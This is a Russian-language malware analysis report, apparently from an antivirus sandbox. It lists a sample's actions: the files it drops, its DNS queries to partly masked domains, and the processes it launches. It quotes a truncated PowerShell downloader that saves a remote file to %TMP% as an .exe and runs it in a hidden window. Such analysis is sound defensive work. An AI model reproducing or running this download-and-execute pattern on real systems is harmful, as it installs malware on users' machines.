Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $svnxx как %temp%\cpfpmtek_ht8.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function lptnubdq([String] $svnxx){(New-Object System.Net.WebClient).DownloadFile($svnxx,''%TMP%\Cpfpmtek_ht8.exe'');Start-Process ''%TMP%\Cpfpmtek_ht8.exe'';}try{l...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1320
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1426566.cvr
- %TEMP%\vgxisqclcf-m.bat
Сетевая активность
UDP
- DNS ASK 6-###ress.ch
- DNS ASK tr#####ha-dinnie.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function lptnubdq([String] $svnxx){(New-Object System.Net.WebClient).DownloadFile($svnxx,''%TMP%\Cpfpmtek_ht8.exe'');Start-Process ''%TMP%\Cpfpmtek_ht8.exe'';}try{l...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Vgxisqclcf-m.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Vgxisqclcf-m.bat" "
